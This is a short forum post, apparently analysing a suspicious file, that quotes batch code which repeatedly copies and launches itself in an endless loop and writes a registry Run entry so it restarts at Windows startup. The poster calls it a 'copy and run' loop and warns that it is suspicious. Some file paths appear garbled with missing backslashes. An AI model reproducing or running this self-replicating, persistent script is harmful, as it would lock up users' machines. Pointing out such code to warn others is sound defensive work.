Quote:
@echo off
>>"C:2.bat" ECHO :1
>>"C:2.bat" ECHO copy 2.bat C:3.bat
>>"C:2.bat" ECHO copy 2.bat C:4.bat
>>"C:2.bat" ECHO copy 2.bat C:5.bat
>>"C:2.bat" ECHO start C:2.bat
>>"C:2.bat" ECHO start C:3.bat
>>"C:2.bat" ECHO start C:4.bat
>>"C:2.bat" ECHO start C:5.bat
>>"C:2.bat" ECHO copy C:2.bat C:windows1.bat
>>"C:2.bat" ECHO copy C:3.bat C:windows2.bat
>>"C:2.bat" ECHO copy C:4.bat C:windows3.bat
>>"C:2.bat" ECHO start C:windows1.bat
>>"C:2.bat" ECHO start C:windows2.bat
>>"C:2.bat" ECHO start C:windows3.bat
>>"C:2.bat" ECHO goto 1 (run this loop again)
start C:2.bat
|
seems to me like a "copy and run" loop :P
also is this very suspicious:
Quote:
|
>>"C:1.reg" ECHO >>"C:1.reg" ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentV ersionRun]
|
why it writes itself in registry run? (it will start on windows startup)
so its basicly an infinite loop, that will run without stop :P
---
the stealth.dll looks somehow real to me, but its protected very good.
/edit:
oh h4x00rHT was faster